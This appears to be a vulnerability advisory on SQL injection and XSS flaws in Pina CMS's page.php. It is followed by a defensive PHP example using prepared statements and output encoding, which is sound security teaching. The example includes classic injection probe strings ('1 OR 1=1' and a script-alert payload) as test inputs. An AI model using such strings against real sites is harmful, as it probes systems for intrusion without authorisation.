vendor: Pina CMS
by: Shadman Tanjim
CVSS: 8,8 HIGH
SQL Injection and XSS
CWE: 89, 79
Product Name: Pina CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/Linux
2014
Pina CMS SQL Injection and XSS Vulnerabilities
The vulnerability exists due to insufficient filtering of user-supplied input in the 'blog_id' and 'search' parameters of the 'page.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. An attacker can also inject arbitrary web script or HTML through the application's 'search' parameter. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials, modify data, deface the web site, perform phishing attacks and launch other attacks.
Mitigation:
Input validation should be used to prevent SQL injection attacks. Also, the application should properly sanitize user-supplied input before using it in the generated web page.
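
The mitigation above, as an added PHP example (not Pina CMS code and not from the original advisory): 'blog_id' is validated as an integer and bound through a prepared statement, and 'search' is bound as a LIKE parameter and HTML-encoded before output. The posts table, its columns, and the function names renderPost, renderSearch and e are assumptions made for illustration.

```php
<?php
// Hypothetical handlers for the 'blog_id' and 'search' parameters.
// Table, column and function names are assumptions, not Pina CMS code.
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (title) VALUES ('First post'), ('Second post')");

// Encode a value for use in HTML text or a quoted attribute.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderPost(PDO $db, $blogId): string {
    // Validation: only a positive integer is accepted as an id.
    $id = filter_var($blogId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '<p>Invalid blog id.</p>';
    }
    // The value is bound as a parameter and never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT title FROM posts WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $title = $stmt->fetchColumn();
    return $title === false ? '<p>Not found.</p>' : '<h1>' . e($title) . '</h1>';
}

function renderSearch(PDO $db, string $term): string {
    // Escape LIKE wildcards so the term matches literally, then bind it.
    $like = '%' . addcslashes($term, '%_\\') . '%';
    $stmt = $db->prepare("SELECT title FROM posts WHERE title LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $like]);
    // The echoed search term and every result are HTML-encoded on output.
    $html = '<p>Results for "' . e($term) . '":</p><ul>';
    foreach ($stmt->fetchAll(PDO::FETCH_COLUMN) as $title) {
        $html .= '<li>' . e((string) $title) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed inputs: a non-integer id, a valid id, and a term containing markup.
echo renderPost($db, '1 OR 1=1'), "\n";
echo renderPost($db, '2'), "\n";
echo renderSearch($db, '<script>alert(1)</script>'), "\n";
```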